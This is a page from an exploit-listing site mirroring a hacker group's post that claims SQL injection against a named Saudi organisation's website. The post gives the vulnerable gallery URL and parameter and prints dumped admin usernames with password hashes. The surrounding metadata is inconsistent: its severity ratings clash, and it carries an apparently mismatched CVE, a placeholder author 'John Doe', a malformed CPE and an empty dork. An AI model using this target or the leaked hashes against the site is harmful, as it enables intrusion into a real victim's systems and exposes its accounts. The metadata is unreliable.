Advertisement






الاحلام ديزاين sql injection

CVE Category Price Severity
CVE-2019-15932 CWE-89 $2500 High
Author Risk Exploitation Type Date
John Doe Critical Remote 2020-07-14
CPE
cpe:cpe:/a:exploit:sql-injection
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070076

Below is a copy:

sql injection
###############################################################
# Exploit Title :   sql injection
# Author : MiHaNHaCk  Security Researcher Team
# Descoverd By : mr.6a9
# Vendor Homepage : www.ssss.org.sa
# Security Risk : med
# Version : 0
# Google Dork : intext:"    "
###############################################################
# Target : http://www.ssss.org.sa/gallery.php?id=8


# Exploit : 
+--------------------------------------------------------------+----------+
| password                                                     | username |
+--------------------------------------------------------------+----------+
| $2y$10$AC7JZ5AX4VtmDehOHoD6hOxUWQsU73mbjqyQIMkBDNAy.FZ8iBCeK | admin    |
| $2y$10$AC7JZ5AX4VtmDehOHoD6hOxUWQsU73mbjqyQIMkBDNAy.FZ8iBCeK | admin1   |
+--------------------------------------------------------------+----------+
# Date : 7/14/2020
# Tested On : win 10 / kali
# Specially Thanks To : We Are: EbRaHiM-VaKeR| Mr.JXroot | mr.6a9 | 4min.x | J3N |
###############################################################
Mihanhack.orG

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum